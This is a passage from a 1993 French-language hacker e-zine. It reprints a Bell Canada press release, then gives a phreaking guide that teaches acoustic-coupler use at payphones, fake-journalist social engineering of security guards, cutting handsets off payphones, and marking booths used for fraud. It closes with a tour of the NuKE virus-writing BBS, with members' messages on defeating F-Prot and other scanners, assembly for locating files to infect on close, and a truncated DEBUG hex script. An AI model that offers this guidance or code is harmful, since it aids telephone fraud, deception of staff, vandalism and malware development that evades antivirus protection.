sur l'ensemble du territoire canadien. Pas plus gros qu'une calculatrice, le tlphone sans fil se glissera dans la poche ou dans le sac main. Il fonctionnera partout o seront installes des bases spciales. Une fois le rseau mis en place, les usagers pourront faire ou recevoir des appels au bureau aussi bien qu' la maison, au restaurant ou au centre commercial. Bell Canada, qui est engage activement dans la recherche sur la tlphonie sans fil depuis 1990, assiste avec enthousiasme l'implantation de cette technologie. La compagnie continuera d'en appuyer le dveloppement, notamment en offrant l'accs au rseau tlphonique public. LES QUATRE COMPAGNIES RETENUES Sept entreprises taient en lice pour la prestation des service de tlphonie sans fil. Le ministre des Communications a dcid d'accorder des licences quatre d'entre elles. Ce sont: --Canada Popfone Corp.,un consortium d'entreprises de communications sous la direction de Call-Net Entreprises Ltd., --Mobility Personacom Ltd., un consortium des filiales des partenaires de Stentor spcialises dans la tlphonie cellulaire, --Rogers Cantel Mobile Inc., une socit de tlphonie cellulaire de Toronto, --Telezone, un consortium national regroupant surtout des entreprises qui offrent des services de recherche de personne. - 30 - C'est Bell lui-mme qui nous presse de modifier nos habitudes de piratage! Et comme nous coutons toujours le Bell... Mais on n'est pas encore dans les cellulaires cette semaine... Nous sommes dans les cabines tlphoniques, nous avons le portatif, le modem, et... mais o branche-t'on ce maudit modem? Ha ha! Vous cherchez un jack (RJ-11) et vous n'en trouvez pas! C'est donc mal pens, ces cabines-l! En effet, part dans les aroports, vous ne rencontrerez que trs rarement des cabines avec des prises de tlphone vous permettant de brancher votre modem. Il faut donc faire appel un coupleur acoustique. Un coupleur, c'est un espce de handset qui va relier l'acoustique du tlphone de la cabine votre modem. Radio-Schack en a parfois, sinon faites marcher vos doigts et cumez les pages jaunes dans les rubriques "lectronique" et "Tlphonie". Vous pouvez encore appeler chez Addison, Montral, et vous faire envoyer le catalogue. Vous trouverez des coupleurs acoustiques dans la section Industrielle... Le numro de Addison est 514-376-1740. Sinon, il y a cette compagnie amricaine, Unlimited Systems Corp., de San Diego, qui vend un kit complet de voyage (Coupleur Konexx Modle 203, adapteur tlphonique Merlin, batterie 9 volts, etc) pour 169 $US. Commandez au 1-800-275-6354. JE SUIS CASS, MAIS JE SUIS QUIP! QUE DOIS-JE FAIRE? Je dbute, mais j'ai du beat! Quelques petits conseils pour les hackers nomades. Il y a fort parier que si vous choisissez de frquenter les endroits publics en fin de soire, un agent de scurit plus curieux que les autres va vous demander ce que vous faites avec un ordi branch sur le tlphone. Encore une fois, ce genre de rencontre est moins embarrassant au Mail St-Roch, parce que l'intrieur du Mail est public, contrairement la plupart des centres d'achats (les gens de 2600 D.C. en savent quelque chose...). Il y a des gens qui VIVENT dans des appartements, des chambres plutt, qui donnent sur le mail. Vous pouvez de plus vous mler la foule des poivrots qui hante ces lieux. Les agents sont beaucoup plus cools. Ceci dit, vous pouvez toujours les bullshitter. Un truc que j'utilise, c'est celui du journaliste de passage Qubec. Voici comment procder: 1) Achetez-vous une revue parlant de voyage dans un kiosque: Cond Nast a de belles photos... 2) Trouvez-vous une machine fabriquer des cartes d'affaires automatique. Il y en a une Place Qubec, juste au dessus des anciens cinmas. 3) Trouvez-vous un nom plausible et totalement inconnu parmi les collaborateurs de la revue. Faites-vous quatre ou cinq cartes avec ce nom, et rajoutez des dtails comme des numros de tlphone dans le 416 ou le 613, un numro de fax, la mention "REPORTER FOR HIRE" sous le nom, ce qui vous chante quoi. Vous voil arm pour toute sance de social engineering qui pourrait se prsenter. Ca pourrait ressembler ca... Je suis en train de fumer une cigarette, appuy contre le tlphone, en attendant que le d/l se termine. Le couvercle de mon portatif est quasiment referm, histoire qu'un ventuel emmerdeur ne voit pas ce qui s'y passe. Un agent de scurit s'aproche pour faire un brin de jasette. Agent - "Que faites-vous l?" Vous - "J'envoie un papier la salle de rdaction." Agent - "Vous faites quoi?" Vous sortez de manire tout fait dbonnaire une carte de votre poche de chemise - "Peter Zwygboski, collaborateur occasionnel la revue Cond Nast." Vous sortez le dernier numro de la poche de votre veston, et lui tendez. "Connaissez-vous cette revue?" Agent - "Non, jamais entendu parler" (Ne soyez pas dmonts, il est bien connu que ces gens ne savent pas lire...) Vous - "Regardez la page 83, il y a un article de moi sur les torrides tortues du Totuba Tabo..." (Ca aiderait que vous ayez jet un coup d'oeil l'article en question, et que vous lui rpondiez dans un franais cass) Agent - (Aprs avoir regard l'article) "Ca m'explique toujours pas ce que vous faites l". Vous - "Vous connaissez les technologies modernes, je suppose. J'envoie par ordinateur mon texte sur Qubec au bureau de New-York pour le prochain numro." Agent - (Il a vraiment du temps perdre, ce con) "Pourquoi vous faites pas a de votre chambre d'htel?" Vous - "Je n'ai pas de chambre justement. Je suis stationn dans la rue, et je prends quelques minutes pour envoyer mon texte. Je dois continuer sur Charlevoix cette nuit, parce qu'on m'a demand de faire un papier sur cette rgion la lumire de l'implantation prochaine des casinos." Gnralement, l'agent tourne les talons ce moment l... Courez aprs pour rcuprer votre revue, avec un grand sourire! Variantes: vous mesurez 4'6", et n'avez manifestement pas plus de 16 ans: vous tes un tudiant d'une cole de Montral venu faire un papier pour le journal de l'association sur la course l'exploit telle qu'elle se pratique Qubec. Vous aurez pris une cabine pas loin d'un htel, et vous oublierez l'histoire des cartes d'affaires. Ou vous avez moins de trente ans, mais ne paraissez pas tre un collgien. Changez la revue pour un mag sur le skateboard, et travaillez sur une explication de circonstance... Quoiqu'il arrive, l'agent de scurit, au pire (VRAIMENT AU PIRE!) ne peut que vous demander de quitter les lieux. Vous remballez tranquillement votre stuff. Une autre manire de ne pas tre emmerd, pour ceux qui ne seraient pas tents par le social engineering. Allez dans une cabine extrieure avec un cutter et sectionnez l'acoustique au ras de la bote. Dguerpissez... Lorsque vous serez la cabine d'o vous voulez placer votre appel, ploguez tout votre stock, dposez le sur la tablette, et lorsque votre d/l est parti, recouvrez le tout avec un manteau. Si quelqu'un s'amne, plantez-vous devant la cabine et faites semblant de parler dans L'AUTRE acoustique, celle qui ne sert rien, celle que vous avez chaparde. Ils n'y verront que du feu... garanti.... Un dernier truc: ne retournez jamais deux fois dans la mme cabine. Ce serait courir un risque inutile au cas, fort improbable, o des agents du Bell seraient posts, dans l'espoir que le fraudeur revienne. Avec un gros marqueur au crayon feutre, un marqueur INDLBILE, faites une marque sur la cabine d'o vous venez de pirater, avec la date, de manire ce qu'un autre pirate qui passerait par l quelques jours plus tard sache que cette cabine est peut-tre surveille. crivez un gros "NPC" sur la fentre de plexi sur le ct de la cabine. C'est un signe de reconnaissance qui en vaut bien un autre... Et dites: MERCI NPC! ON VEUT VOTRE BIEN, ET ON VA L'AVOIR! CHRIE, BARRE LES PORTES, ON SORT... Visite d'un co0l board: Cybernetic Violence par Santa Claus Greets: Pure Energy (Autorisation) Salut les mecs, content de vous revoir. Fin de la formule de politesse. Pour ce numro, soit dit en passant, exceptionnel, c'est le Cybernetic Violence qui va passer au broyeur. Ce board est exclusivement H/P/C/A/V et a dj sa rputation de faite. Histoire de voir un peu de pays, on va suivre la recette originelle... On ne brise pas une combinaison gagnante... Et pas de "J'en ai rien foutre de c'te place l!", C'est quand mme de notre chre patrie dont on parle ici. Pas seulement de notre patrie le cyberspace, mais c'est un board qubcois... Et puis il est, disons, "suprieur beaucoup d'autres", pour ne pas outrer personne avec un autre terme qui pourrait ne pas convenir... (Elite...) Mais faut croire que la qualit des boards en gnral a baiss depuis la fermeture du dfunt Blitzkrieg... Et si par pur hasard le NPC-004 tombait entre les mains de l'ex-sysop de Blitzkrieg BBS, prire de nous contacter... Nous sommes en deuil... (Un peu de tenue, c'est quand mme la fin du monde...) Je disais donc? Ah! Oui... Le Cybernetic: histoire de ne pas perdre de temps, on va commencer... Faudrait pas que j'empite sur les plates-bandes des autres... Allez! Welcome to Cybernetic Violence - NuKE/NuKENet WHQ - (1:950/0), NuKE / NuKENet World HeadQuarters SysOp: Pure Energy Co-SysOp: Rock Steady - Running With a 16.8 K HST - H/P/C/A/V Only - NuKE Member board - NuKeNeT Whq - InterNet/Usenet Node (Virus.Comp) Cybernetic Violence est le World HeadQuarter de NuKE, un groupe principalement ax sur les virii. Pour vous situer un peu, les deux leaders, ma foi, incontests, du monde des virii sont NukE et Phalcon/Skism. Au got de Blitz, cependant, rien n'approche la qualit des messageries du NuKENeT, toujours en ce qui concerne les virii. Et on va vous en faire la preuve. NuKENeT est un des nets underground les plus recherchs par les babs dignes de ce nom. Il se rpand partout en Europe (avec des nodes officielles en Suisse, notamment) et en Australie (mate!). Voici d,ailleurs certaines de nodes officielles de NukE... NuKE-NeT BBS Name Number Location SysOp Node Cybernetic Violence 514-385-XXXX Montreal Pure Energy 1:950/0 Disintegration Zone 514-PRI-VATE Montreal Rock Steady 1:950/1 The Hell Pit 708-459-XXXX Illinois Kato & Hades1:950/2 Total Mayhem +61-3-PRIVATE Australia Phrozen Doberman 1:950/3 The Pit +61-3-742XXXX Australia Greyswandir 1:950/4 Brain Damage 819-778-XXXX Hull Dark Angel 01:950/5 PhunLine ][ +46-8-716XXXX Sweden Ford Fairlane 1:950/6 Land of Silence 418-687-XXXX Quebec City CoaxialKarma1:950/7 Enigma E:N:U:N +41-22-340XXXX Switzerland Savage Beast1:950/8 Demoralized City +46-31-91XXXX Sweden Tormentor 1:950/9 Power House BBS 416-692-XXXX Toronto Thunder 1:950/10 NuKE compte parmi ses rangs des noms aussi prestigieux que Rock Steady ou le fameux Nowhere Man, le crateur du dsormais clbre VCL. DISTRIBUTION DES MESSAGERIES General Topics [NuKENeT] Anti-Viral Talk [NuKENeT] ASM Programming [NuKENeT] Unix Systems [NuKENeT] Phreaking Away [NuKENeT] System Entry [NuKENeT] NuKE/SCP Public [NuKENeT] Comp.Virus (Internet)[NuKENeT] Alt.Security [NuKENeT] On va tout d'abord visiter la messagerie la plus pte de toutes, Anti-Viral Talk. C'est pas compliqu, pour le commun des mortels, ce type de discussion ressemble du serbo-croate... Msg #: [104/121] Base: Anti-Viral Talk [NuKENeT] Date : 17 Jan 93 19:26:34 Stat: Sent From : Arthur Ellis To : All Title: Virus Statistics I have not seen any good statistical analyses of viruses, with the exception of the various MtE tests. So here is a beginning. A program called CHKINT was used to detect possible interrupts by scanning for CDh opcodes. This is an approximate measure only. Frequency of Interrupts in a sample of 908 different .COM type viruses, sampled using CHKINT.EXE. Freq int fn | Freq int fn | Freq int fn | Freq int fn ----------------|---------------|---------------|--------------- 24 00h 01h | 3 00h 02h | 6 00h 03h | 2 00h 04h 2 00h 05h | 1 00h 06h | 1 00h 44h | 28 01h 01h 4 01h 02h | 1 01h 04h | 1 01h 06h | 1 01h 17h 15 02h 01h | 3 02h 02h | 2 02h 03h | 1 02h 06h 10 03h 01h | 2 03h 02h | 1 03h 03h | 1 03h 05h 1 03h 07h | 14 04h 01h | 1 04h 02h | 2 04h 03h 1 04h 07h | 10 05h 01h | 4 05h 02h | 1 05h 03h 3 05h 04h | 13 06h 01h | 5 06h 02h | 11 07h 01h 5 07h 02h | 1 07h 23h | 1 07h FAh | 7 08h 01h 5 08h 02h | 1 08h 12h | 7 09h 01h | 4 09h 02h 7 0Ah 01h | 1 0Ah 02h | 7 0Bh 01h | 1 0Bh 02h 1 0Bh 03h | 2 0Bh 04h | 3 0Bh 07h | 5 0Ch 01h 7 0Dh 01h | 1 0Dh 03h | 1 0Dh 06h | 9 0Eh 01h 1 0Eh 02h | 7 0Fh 01h | 1 0Fh 03h |125 10h 01h 25 10h 02h | 37 10h 03h | 8 10h 04h | 5 10h 05h 11 10h 06h | 6 10h 07h | 3 10h 08h | 5 10h 09h 4 10h 0Ah | 1 10h 0Bh | 3 10h 0Ch | 1 10h 0Dh 1 10h 0Eh | 2 10h 0Fh | 1 10h 10h | 2 10h 12h 2 10h 14h | 3 10h 15h | 1 10h 1Eh | 8 11h 01h 3 11h 02h | 2 11h 05h | 16 12h 01h | 2 12h 02h 1 12h 03h | 79 13h 01h | 31 13h 02h | 15 13h 03h 15 13h 04h | 11 13h 05h | 10 13h 06h | 1 13h 07h 4 13h 08h | 5 13h 09h | 6 13h 0Ah | 1 13h 0Bh 1 13h 0Ch | 4 14h 01h | 2 14h 02h | 1 14h 03h 1 14h 04h | 1 14h 05h | 11 15h 01h | 6 15h 02h 2 15h 03h | 1 15h 04h | 1 15h 06h | 1 15h 1Bh 34 16h 01h | 28 16h 02h | 3 16h 03h | 4 16h 04h 2 16h 05h | 2 16h 06h | 1 16h 0Ah | 9 17h 01h 2 17h 02h | 1 17h 03h | 4 18h 01h | 2 18h 02h 30 19h 01h | 7 19h 02h | 55 1Ah 01h | 14 1Ah 02h 16 1Ah 03h | 1 1Ah 04h | 1 1Ah 06h | 4 1Bh 01h 1 1Bh 02h | 1 1Bh 03h | 6 1Ch 01h | 4 1Ch 02h 3 1Ch 03h | 4 1Dh 01h | 1 1Dh 02h | 1 1Dh 04h 1 1Dh 06h | 3 1Eh 01h | 3 1Eh 02h | 2 1Fh 01h 1 1Fh 02h | 1 1Fh 03h | 1 1Fh 44h |351 20h 01h 75 20h 02h | 14 20h 03h | 15 20h 04h | 3 20h 05h 1 20h 09h | 87 21h 01h | 44 21h 02h | 17 21h 03h 18 21h 04h | 16 21h 05h | 20 21h 06h | 14 21h 07h 21 21h 08h | 29 21h 09h | 41 21h 0Ah | 17 21h 0Bh 24 21h 0Ch | 18 21h 0Dh | 15 21h 0Eh | 28 21h 0Fh 14 21h 10h | 24 21h 11h | 25 21h 12h | 14 21h 13h 33 21h 14h | 19 21h 15h | 23 21h 16h | 21 21h 17h 21 21h 18h | 16 21h 19h | 5 21h 1Ah | 6 21h 1Bh 10 21h 1Ch | 12 21h 1Dh | 5 21h 1Eh | 5 21h 1Fh 2 21h 20h | 5 21h 21h | 3 21h 22h | 8 21h 23h 6 21h 24h | 7 21h 25h | 8 21h 26h | 4 21h 27h 6 21h 28h | 3 21h 29h | 2 21h 2Ah | 5 21h 2Bh 4 21h 2Ch | 9 21h 2Dh | 25 21h 2Eh | 10 21h 2Fh 5 21h 30h | 2 21h 31h | 1 21h 32h | 5 21h 33h 1 21h 37h | 1 21h 38h | 1 21h 39h | 1 21h 3Ah 4 21h 3Bh | 2 21h 3Ch | 1 21h 3Eh | 1 21h 40h 1 21h 42h | 1 21h 44h | 1 21h 47h | 1 21h 48h 1 21h 49h | 1 21h 4Dh | 1 21h 4Eh | 1 21h 54h 2 21h 57h | 1 21h 59h | 2 21h 5Ch | 1 21h 64h 1 21h 65h | 1 21h 67h | 1 21h 79h | 1 21h 7Ch 1 21h 84h | 1 21h 8Bh | 3 21h F0h | 3 22h 01h 6 23h 01h | 1 23h 02h | 11 24h 01h | 1 24h 0Ah 18 25h 01h | 7 25h 02h | 3 25h 03h | 1 25h 04h 74 26h 01h | 18 26h 02h | 1 26h 03h | 2 26h 04h 3 26h 05h | 1 26h 0Ch | 33 27h 01h | 1 27h 02h 5 28h 01h | 2 28h 02h | 7 29h 01h | 7 2Ah 01h 3 2Ah 03h | 13 2Bh 01h | 1 2Bh 06h | 8 2Ch 01h 13 2Dh 01h | 1 2Dh 02h | 18 2Eh 01h | 11 2Fh 01h 19 2Fh 02h | 9 2Fh 03h | 16 2Fh 04h | 4 2Fh 06h 2 2Fh 08h | 1 2Fh 09h | 1 2Fh 0Ch | 1 2Fh 1Ah 1 2Fh 20h | 1 2Fh 2Ah | 5 30h 01h | 1 30h 34h 1 30h 38h | 1 31h 01h | 1 31h 03h | 6 32h 01h 1 32h 03h | 2 32h 06h | 5 32h 07h | 2 32h 1Ah 19 33h 01h | 1 33h 04h | 4 34h 01h | 5 35h 01h 1 35h 06h | 1 35h 08h | 7 36h 01h | 5 37h 01h 3 37h 03h | 1 37h 09h | 3 38h 01h | 5 39h 01h 1 39h 12h | 11 3Ah 01h | 1 3Ah 03h | 10 3Bh 01h 1 3Bh 05h | 1 3Bh 07h | 6 3Ch 01h | 6 3Dh 01h 1 3Dh 0Dh | 1 3Eh 01h | 1 3Eh 02h | 3 3Eh 03h 7 3Fh 01h | 37 40h 01h | 2 40h 02h | 1 40h 03h 1 41h 02h | 5 42h 01h | 1 43h 01h | 1 43h 02h 3 44h 01h | 1 44h 02h | 7 45h 01h | 1 45h 02h 2 45h 03h | 9 46h 01h | 6 47h 01h | 1 47h 02h 3 48h 01h | 1 48h 02h | 6 49h 01h | 5 4Ah 01h 3 4Bh 01h | 1 4Bh 03h | 1 4Ch 05h | 6 4Dh 01h 1 4Dh 03h | 7 4Eh 01h | 8 4Fh 01h | 1 4Fh 02h 1 4Fh 16h | 10 50h 01h | 2 50h 05h | 1 50h 36h 4 51h 01h | 2 51h 02h | 3 52h 01h | 1 52h 02h 2 53h 01h | 7 54h 01h | 5 55h 01h | 3 56h 01h 1 56h 02h | 6 57h 01h | 2 58h 01h | 2 58h 02h 9 59h 01h | 2 59h 02h | 6 5Ah 01h | 1 5Ah 02h 7 5Bh 01h | 4 5Ch 01h | 4 5Dh 01h | 4 5Eh 01h 4 5Fh 01h | 4 60h 01h | 2 60h 02h | 5 61h 01h 1 61h 0Bh | 3 62h 01h | 1 62h 02h | 3 63h 01h 1 63h 02h | 1 63h 03h | 1 64h 01h | 2 64h 02h 1 64h 14h | 7 65h 01h | 2 66h 01h | 1 66h 02h 8 67h 01h | 2 67h 05h | 1 67h 08h | 1 67h 23h 1 68h 01h | 3 69h 01h | 1 69h 04h | 2 69h 05h 1 69h 06h | 1 69h 10h | 7 6Ah 01h | 1 6Ah 03h 4 6Bh 01h | 1 6Bh 02h | 2 6Bh 10h | 3 6Ch 01h 2 6Dh 02h | 1 6Dh 05h | 1 6Dh 06h | 1 6Dh 07h 1 6Dh 0Ch | 7 6Eh 01h | 1 6Fh 01h | 1 70h 02h 1 70h 0Bh | 2 70h 10h | 1 70h 20h | 1 71h 01h 4 72h 01h | 1 72h 02h | 1 72h 04h | 7 73h 01h 1 73h 02h | 1 73h 07h | 15 74h 01h | 3 74h 02h 5 74h 03h | 1 74h 07h | 8 75h 01h | 7 75h 02h 2 76h 01h | 2 76h 02h | 3 77h 01h | 3 78h 01h 1 78h 03h | 8 79h 01h | 3 7Ah 01h | 4 7Bh 01h 3 7Bh 05h | 4 7Ch 01h | 2 7Dh 01h | 2 7Eh 01h 1 7Eh 14h | 4 7Fh 01h | 1 7Fh 02h | 4 7Fh 03h 1 7Fh 06h | 30 80h 01h | 3 80h 02h | 2 80h 03h 1 80h 04h | 1 80h 08h | 7 81h 01h | 1 81h 02h 1 81h 06h | 4 82h 01h | 14 83h 01h | 3 83h 02h 1 83h 0Bh | 5 84h 01h | 1 84h 05h | 1 85h 01h 5 86h 01h | 2 87h 01h | 1 87h 02h | 1 87h 03h 1 88h 01h | 1 88h 02h | 1 88h 03h | 3 89h 02h 1 89h 12h | 9 8Ah 01h | 1 8Ah 02h | 1 8Ah 03h 1 8Ah 3Ah | 23 8Bh 01h | 1 8Bh 09h | 4 8Ch 01h 1 8Ch 02h | 6 8Dh 01h | 1 8Dh 02h | 12 8Eh 01h 1 8Eh 02h | 3 8Fh 01h | 2 90h 01h | 1 90h 02h 2 90h 03h | 7 91h 01h | 5 92h 01h | 3 93h 01h 2 94h 01h | 5 95h 01h | 3 96h 01h | 1 96h 02h 2 97h 01h | 1 98h 01h | 1 98h 02h | 3 99h 01h 1 99h 03h | 2 9Ah 01h | 1 9Bh 02h | 3 9Ch 01h 8 9Dh 01h | 2 9Eh 01h | 6 9Fh 01h | 5 A0h 01h 1 A0h 02h | 1 A0h 03h | 8 A1h 01h | 1 A1h 1Ah 2 A2h 01h | 1 A2h 03h | 3 A3h 01h | 1 A3h 0Dh 1 A4h 01h | 1 A4h 02h | 2 A5h 01h | 2 A6h 01h 5 A7h 01h | 1 A7h 03h | 3 A8h 01h | 1 A9h 01h 1 A9h 02h | 8 AAh 01h | 8 ABh 01h | 3 ABh 02h 2 ABh 03h | 3 ABh 04h | 1 ABh 06h | 8 ACh 01h 4 ADh 01h | 2 AEh 01h | 2 AFh 01h | 6 B0h 01h 2 B0h 02h | 5 B1h 01h | 3 B2h 01h | 2 B3h 01h 4 B4h 01h | 1 B4h 07h | 3 B5h 01h | 2 B5h 02h 1 B5h 04h | 3 B6h 01h | 4 B7h 01h | 15 B8h 01h 7 B8h 02h | 1 B8h 03h | 1 B8h 0Dh | 1 B9h 01h 1 B9h 02h | 11 BAh 01h | 1 BAh 04h | 10 BBh 01h 1 BBh 02h | 3 BBh 03h | 7 BCh 01h | 2 BCh 02h 4 BDh 01h | 3 BEh 01h | 6 BEh 03h | 6 BFh 01h 1 BFh 02h | 1 BFh 05h | 3 C0h 01h | 5 C1h 01h 1 C1h 02h | 3 C2h 01h | 2 C2h 02h | 3 C3h 01h 8 C4h 01h | 2 C5h 01h | 5 C6h 01h | 1 C6h 02h 1 C7h 02h | 4 C8h 01h | 4 C9h 01h | 1 C9h 02h 1 CAh 01h | 1 CAh 02h | 4 CBh 01h | 6 CCh 01h 5 CCh 02h | 5 CDh 01h | 8 CDh 02h | 2 CDh 04h 1 CDh 06h | 1 CDh 10h | 1 CDh 14h | 2 CDh 18h 1 CDh 1Eh | 1 CDh 2Eh | 1 CDh 3Eh | 1 CDh 42h 2 CDh 47h | 1 CDh 4Eh | 1 CDh 68h | 1 CDh 71h 1 CDh 97h | 13 CEh 01h | 1 CEh 09h | 2 CFh 01h 2 CFh 02h | 1 CFh 06h | 4 D0h 01h | 1 D0h 09h 2 D1h 01h | 2 D1h 02h | 1 D1h 05h | 6 D2h 01h 1 D2h 05h | 5 D3h 01h | 1 D3h 07h | 1 D4h 01h 5 D6h 01h | 5 D7h 01h | 1 D7h 04h | 9 D8h 01h 1 D8h 03h | 2 D9h 01h | 4 DAh 01h | 9 DBh 01h 4 DCh 01h | 2 DDh 01h | 1 DDh 02h | 1 DEh 01h 1 DFh 01h | 1 DFh 02h | 3 E0h 01h | 1 E0h 02h 1 E0h 06h | 2 E1h 01h | 1 E1h 02h | 2 E2h 01h 2 E2h 02h | 25 E3h 01h | 1 E3h 02h | 2 E4h 01h 2 E4h 02h | 1 E5h 01h | 1 E5h 02h | 2 E6h 01h 1 E6h 02h | 1 E7h 01h | 1 E7h 02h | 6 E8h 01h 1 E8h 15h | 4 E9h 01h | 1 E9h 02h | 1 E9h 05h 1 EAh 01h | 14 EBh 01h | 1 EBh 06h | 2 ECh 01h 1 ECh 03h | 1 ECh 17h | 1 ECh 1Ah | 2 EDh 01h 1 EDh 02h | 4 EEh 01h | 4 EFh 01h | 5 F0h 01h 1 F0h 05h | 1 F1h 02h | 1 F2h 01h | 18 F3h 01h 8 F4h 01h | 8 F5h 01h | 3 F6h 01h | 2 F6h 07h 4 F7h 01h | 2 F8h 01h | 2 F8h 07h | 2 F9h 01h 1 F9h 02h | 4 FAh 01h | 7 FBh 01h | 1 FBh 02h 12 FCh 01h | 3 FCh 02h | 4 FDh 01h | 3 FDh 02h 13 FEh 01h | 1 FEh 03h /\ < AE > \/ --- Msged/sq * Origin: Cyber City (40:2/2) Msg #: [105/121] Base: Anti-Viral Talk [NuKENeT] Date : 18 Jan 93 01:37:01 Stat: Sent From : Aristotle To : Arthur Ellis Title: Virus Statistics If you use that on a STEM and LEAF diagram, then the information you gave would be beneficial to me for sure! ARiSToTLE --- GEcho 1.00/beta+ * Origin: If at first you don't succeed...Dig deeper into the melon! (40:1/13) Msg #: [109/121] Base: Anti-Viral Talk [NuKENeT] Date : 22 Jan 93 00:32:02 Stat: Sent From : Terminator Z To : All Title: OK OK Hot off the press! New virus! COM/EXE/BIN/OVL/SYS Parasitic Resident Polymorphic Multipartite Stealth virus, >>> 2048 bytes << Hi Rock. To> You told me before that you liked dive deep into debugging To> sessions with Scan etc... To> Whatabout making a report of the 'new scanning engine' that Scan To> and Fprot uses? To> Would be very useful, especially when it comes to polymorphic To> code. To> Maybe even extract the algorithm used for catching MtE? To> I mean, if you look to the TPE, there he has put quite much work To> in 'senseless instructions' and 'dumb jumps' but technically the Humm, nice idea, I was working with that as a matter of fact, I was working thru F-prot resently to by-pass some features, and why some of my features didn't work, All it all I think I can provide some info, I hate to do it all myself, I'm really not `too' happy, we got hundreds of Av products. From a Stand point of view, my session with F-prot have been challeging, its good, REAL good, VIRSTOP is not however, compared to VSHIELD. Vshield will be a tough cookie, I dunno what I saw last time, by quite comfusing, maybe its the C++ overhead? But its good, and then Scan, the easiest of the all. However this will take sometime, I would want to form an `team' of debuggers. I can't speak for myself, my lack of knowledge on `Cryption' Sucks, This will throw me far out, but because of my own Cracking background, bypassing any traps won't be a problem, I can handle my self there, and come up with a `AntiStealth' routine to defeat it. But I'm not Good enough. I'm okay, but can't handle all this by my own, I was willing to SET this as a goal for Info Journal #5 or #6, but its demanding, I have been working with Screaming radish resently of F-prot, we talk about some nice routines it had. But we need a few more other guys. A Small team, never the less a good team. I can contact you guys, I don't mind the call charges, (NOT), I don't wish to push anyone, But frankly Tormentor I've seen some of your works, and your groups, quite something, don't be a stranger here. Fuck the moral group expectations, We shouldn't compete, as we have the same target in mind, self-knowledge and show the `AVers' that there 100% effective Scanners suck! Terminator-Z, lots of `steams' comes between us, what do you say? We could use a a cool programmer? Tormentor, So whats next? I'll jump into it if you come along...or else its gotta wait and take a while, lets hit them with a BIG bang! Rocky Msg #: [267/365] Base: ASM Programming [NuKENeT] Date : 12 Jan 93 22:57:00 Stat: Sent From : Ken To : Soltan Griss Title: Disenfect on the fly * In A Message To Ken, Soltan Griss Said: SG> well thats what i have working right now, the only pproblem i seem SG> to have is infecting the file on the close.. how would i get the SG> file name from the handle. I have a PD program that i can add, but SG> it's hugh. and i want a simpler way of doing it.. Here is how I do it. You need to get the system file table (SFT) for the handle number. push bx ; Save file handle mov ax,1220h ; DOS get JFT entry int 2fh ; Call DOS ; ES:[DI] contains the SFT ; entry for the file handle mov ax,1216h ; DOS get SFT entry pointer mov bx,byte ptr [di] ; Put SFT entry number in BX int 2fh ; Call DOS ; ES:DI holds SFT pointer ; for the file ES:DI now points to the SFT. There are also lots of other goodies in this table. Here is the structure for the SFT (from UNDOCUMENTED DOS) For DOS 3.1+ ------------ 00h DWORD Pointer to next file table 04h WORD Number of files in this table 06h 35 bytes per file 00h WORD Number of file handles referring to this file 02h WORD File open mode (Int 21h/AH=3Dh) bit 15 set if opened via FCB 04h BYTE File attribute 05h WORD Device info word 07h DWORD Pointer to device driver header if char. device else pointer to DOS drive parameter block 0Bh WORD Starting cluster of file 0Dh WORD File time in packed format (Int 21h/AX=5700h) 0Fh WORD File date in packed format (Int 21h/AX=5700h) 11h DWORD File size 15h DWORD Current offset in file 19h WORD Relative cluster within file of last accessed * 1Bh WORD Absolute cluster number of last accessed 0000h if never read or written to * 1Dh WORD Number of sector containing directory entry 1Fh BYTE Number of directory entry within sector --> 20h 8 BYTES Filename (No extension, padded with spaces) --> 28h 3 BYTES File Extension 2Bh DWORD (SHARE.EXE) pointer to previous SFT sharing same file 2Fh WORD (SHARE.EXE) network machine number which opned file 31h WORD PSP segment of file's owner 33h WORD Offset within SHARE.EXE code segment of sharing record * For DOS 4.x ----------- 1Bh DWORD Number of sector containing directory entry 1Dh 3 BYTES Unknown (Network redirector) 35h WORD (local) absolute cluster number of last accessed 37h DWORD Pointer to IFS driver for file, 00000000h if native DOS So, in both cases, the file extension will start at DI+39. -Ken --- GEcho 1.00/beta+ * Origin: 2181EBE700727B8CC1F913CBB44ACD21 - (40:1/1) Msg #: [274/365] Base: ASM Programming [NuKENeT] Date : 17 Jan 93 19:29:27 Stat: Sent From : Arthur Ellis To : All Title: CHKINT.COM Here is the interrupt checker. It can be useful for finding unusual interrupt routines. N CHKINT.COM E 0100 E9 99 01 0D 0A 43 48 4B 49 4E 54 20 28 43 29 20 E 0110 62 79 20 50 61 64 67 65 74 74 2C 20 31 39 38 39 E 0120 0A 0D 20 45 78 74 72 61 63 74 73 20 49 6E 74 65 E 0130 72 72 75 70 74 20 53 65 71 75 65 6E 63 65 73 20 E 0140 28 43 44 20 78 78 29 20 66 6F 75 6E 64 20 69 6E E 0150 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 E 0160 73 0A 0D 20 49 6E 76 6F 63 61 74 69 6F 6E 3A 20 E 0170 43 48 4B 49 4E 54 20 3C 66 69 6C 65 6E 61 6D 65 E 0180 3E 1A 24 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0280 00 00 00 00 24 00 00 00 00 00 00 00 20 20 20 00 E 0290 00 68 20 20 20 20 00 00 68 0D 0A 24 B4 62 CD 21 E 02A0 8E C3 BE 80 00 26 8A 0C 80 F9 00 75 09 BA 63 01 E 02B0 B4 09 CD 21 CD 20 46 8B 16 83 02 32 FF 8A D9 03 E 02C0 DE 26 89 17 46 89 36 85 02 B4 